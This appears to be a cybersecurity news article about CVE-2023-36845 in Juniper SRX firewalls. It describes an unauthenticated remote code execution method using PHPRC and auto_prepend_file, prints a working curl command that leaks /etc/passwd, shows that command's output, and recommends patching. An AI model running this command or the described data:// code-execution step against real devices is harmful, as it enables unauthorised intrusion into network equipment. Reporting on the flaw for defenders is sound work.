Over 80% of Juniper Firewalls Vulnerable to Unauthenticated Code Execution

At the end of August 2023, Juniper Networks released a security advisory mentioning the CVE-2023-36845 vulnerability affecting SRX and EX series firewalls. The vulnerability was categorized as a Medium (5.3) severity vulnerability. 

Following this, security researchers at watchtowr published a method that could exploit this vulnerability along with the proof of concept. This particular report included the exploitation of the do_fileUpload function inside the webauth_operation.php file in the J-Web interface of the SRX firewalls. 

After this method, several threat actors started to target the webauth_operation.php file to exploit vulnerable Juniper Firewalls.

Security researchers have discovered a new method that could perform an unauthenticated remote code execution without uploading any files (watchTowr method).

Get a Demo

Start protecting your SaaS data in just a few minutes!

With DoControl, you can keep your SaaS applications and data safe and secure by creating workflows tailored to your needs. It’s an easy and efficient way to identify and manage risks. You can mitigate the risk and exposure of your organization’s SaaS applications in just a few simple steps.

Try Free Demo

File Upload Not available = PHPRC + cURL

As part of the analysis, researchers purchased an SRX210 firewall and tried to exploit it using the watchTowr file upload method. Unfortunately, it was not possible as the do_fileUpload was unavailable on the specified firewall.

On investigating further, researchers discovered that Juniper firewalls use an Appweb server which invokes a CGI script. This CGI script uses multiple environment variables and arguments for accessing the user’s HTTP request. Additionally, these firewalls run on FreeBSD that can access stdin by opening /dev/fd/0.

Initially, a curl request was sent with the auto_prepend_file=”/etc/passwd” which resulted in successfully leaking the information of the /etc/passwd file.

However, in order to achieve remote code execution, researchers enabled the allow_url_include feature and sent a curl request to the firewall.

This time, the request included allow_url_include,  auto_prepend_file and data:// (embedded with  <? phpinfo(); ?>) which resulted in an unauthenticated code execution. 

$ curl “http://10.12.72.1/” -F $’auto_prepend_file=”/etc/passwd\n”‘ -F ‘PHPRC=/dev/fd/0’ root:*:0:0:Charlie &:/root:/bin/csh daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin ext:*:39:39:External applications:/:/sbin/nologin bind:*:53:53:Bind Sandbox:/:/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”> <html> <head> <meta http-equiv=”Content-Type” content=”text/html”/> <link rel=”stylesheet” href=”/stylesheet/juniper.css” type=”text/css”/> <title>Log In – Juniper Web Device Manager</title> <link rel=”shortcut icon” href=’images/favicon.ico’ type=”image/x-icon”/> </head>

Furthermore, a complete report has been published by Vulncheck, which also included shocking information that nearly 15,000 internet-facing Juniper firewalls were yet to be patched. 

Nevertheless, researchers also published a GitHub repository that contains a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable.

Organizations using Juniper Firewalls are recommended to upgrade to the latest version as per the security advisory released by Juniper Networks in order to prevent threat actors from leveraging these methods for exploitation.

Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.